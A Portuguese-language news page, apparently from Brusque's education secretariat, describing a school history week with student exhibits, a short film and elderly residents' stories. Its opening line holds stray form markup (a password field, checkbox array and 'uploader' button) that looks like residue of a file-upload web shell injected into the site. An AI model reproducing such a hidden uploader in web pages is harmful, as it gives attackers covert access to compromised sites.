POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" 1ª SEMANA DE HISTÓRIA DA EEF PROFª ISAURA GOUVÊA GEVAERD – Secretaria de Educação de Brusque
a
a
Weather:
city not found
HomeBRUSQUE 157 ANOS1ª SEMANA DE HISTÓRIA DA EEF PROFª ISAURA GOUVÊA GEVAERD

1ª SEMANA DE HISTÓRIA DA EEF PROFª ISAURA GOUVÊA GEVAERD

Do dia 31 de julho a 03 de agosto a EEF Profª Isaura Gouvêa Gevaerd teve uma semana recheada de história com o objetivo de reviver tempos que não podem ser esquecidos jamais. Para que cada um entenda como são as coisas hoje, faz-se necessário compreender que tudo ocorre dentro de um tempo, de um processo, que nada muda de uma hora para outra… Estudando esse processo de construção da cidade de Brusque, onde nascemos ou escolhemos para viver, cada aluno buscou entender suas origens, seus antepassados, o progresso e desenvolvimento de um povo.

A abertura da semana se deu com a presença dos atiradores do Tiro de Guerra 005, que a capela, cantaram o Hino Nacional Brasileiro. Eles expuseram também alguns materiais utilizados em atividades de campo. Na montagem do “Mini Museu”, alunos dos 6º anos procuraram mostrar e valorizar objetos de seus pais, avós, bisavós. Algo que foi importante para eles e que tem um significado especial na vida de cada família.

O trabalho com imagens trouxe para os alunos dos 7º anos a prova viva do desenvolvimento da cidade e do povo que nela vive, fazendo ampliação das imagens antigas e atuais, maquetes, desenhos da arquitetura germânica. Os 7º anos também ficaram responsáveis pelas homenagens cívicas da semana.

Os 8º anos estudaram o livro de Maria Luiza Renaux, “Tragédia e mistério na Villa Renaux” e a partir daí construíram um curta metragem em um casarão (antigo moinho), pertencente a família Milani. Ainda construíram a planta baixa e alta do casarão da família Renaux.

Os 9º anos trouxeram alguns idosos da comunidade para juntos viajarem através das histórias contadas por eles. Os alunos ficaram fascinados com a história da união de um casal que está junto há mais de 59 anos, com a história de uma mãe de 13 filhos que deixou de estudar porque foi proibida pelo pai, um homem que usou os primeiros sapatos na sua primeira comunhão, a vida dentro da fábrica Renaux por mais de 30 anos, o beijo roubado, o namoro vigiado… A emoção tomou conta da sala de aula com tanta riqueza de fatos!

Ainda os alunos dos 9º anos aproveitaram a ocasião e apresentaram através de exposição, seus trabalhos sobre a Segunda Guerra Mundial. Foi um trabalho a muitas mãos! Muitas pessoas se envolveram para que a “I Semana de História” acontecesse. Memórias de um povo contribuindo para a formação cultural e histórica dos alunos e professores dando maior significado ao aprendizado.

Sem comentários
%d blogueiros gostam disto: